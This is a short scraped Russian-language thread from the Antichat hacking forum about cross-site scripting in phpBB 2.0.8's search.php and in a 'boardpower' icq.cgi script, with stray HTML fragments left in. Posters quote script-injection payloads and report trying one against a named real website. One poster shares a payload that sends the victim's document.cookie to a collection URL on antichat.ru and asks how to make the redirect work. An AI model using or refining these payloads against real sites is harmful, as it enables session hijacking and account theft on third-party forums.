Форум АНТИЧАТ - Xss в phpBB 2.0.8

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Xss в phpBB 2.0.8 (https://forum.antichat.xyz/showthread.php?t=2401)

Xss в phpBB 2.0.8

В phpBB 2.0.8 есть уязвимость в search.php и показан пример </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.example.com/phpBB2/search.php?search_author='<script>alert(documen t.cookie)</script>[/QUOTE]<span id='postcolor'>
проверал на саитах но не на одново неработает, например:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://www.bpmdigitaldjgear.com/phpBB2/search.php?search_author='<script>alert('kkl&#39http://forum.antichat.ru/iB_html/non...icons/wink.gif;</script>[/QUOTE]<span id='postcolor'>

помогите, что делаю нетак?

Закрыта там эта бага...
Да все равно от нее толку - ноль

Вот нашел boardpower баг работаюший если так
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=<script>javascript:alert(documen t.cookie);</script>[/QUOTE]<span id='postcolor'>
показивает как надо, но если так
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">boardpower/icq.cgi?action=%3Cscript%3Ewindow.location='http://antichat.ru/cgi-bin/s.jpg?Info='+document.cookie%3C/script%3E[/QUOTE]<span id='postcolor'>
то неработает.
почему  window.location неработает?